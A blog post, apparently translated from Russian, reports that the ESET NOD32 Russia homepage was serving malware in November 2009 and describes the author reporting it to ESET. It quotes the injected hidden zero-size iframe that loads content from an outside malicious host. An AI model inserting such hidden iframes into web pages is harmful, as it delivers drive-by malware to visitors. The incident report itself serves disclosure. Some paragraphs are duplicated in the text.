Virus on ESET NOD32 Russia website
Yesterday, 11/19/2009, going to the home page of the site ESET NOD32 Russia (ahtung! Not sure - do not go!), Was unpleasantly surprised: some left pdf-file unexpectedly opened, after which Comodo Firewall reported that Opera browser is trying to launch wJQs.exe file
UPD: Transferred viruses (and antiviruses) to the blog
UPD2: it seems to be fixed
I looked at the page code. So, iframe:
Unsubscribed on the official forum, sent a virus sample. By evening, the virus was identified and added to the signature database, for which many thanks to the staff of the ESET laboratory and forum participants. However, the site administrators are in no hurry to remove the Trojan from the main page. Therefore, visiting these days on the site NOD32, beware!
UPD: Transferred viruses (and antiviruses) to the blog
UPD2: it seems to be fixed
I looked at the page code. So, iframe:
<iframe pcvsn='j6Av392D' src='http://newiframe.com/s/in.cgi?6 ' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe>Unsubscribed on the official forum, sent a virus sample. By evening, the virus was identified and added to the signature database, for which many thanks to the staff of the ESET laboratory and forum participants. However, the site administrators are in no hurry to remove the Trojan from the main page. Therefore, visiting these days on the site NOD32, beware!
')
Source: https://habr.com/ru/post/75846/
All Articles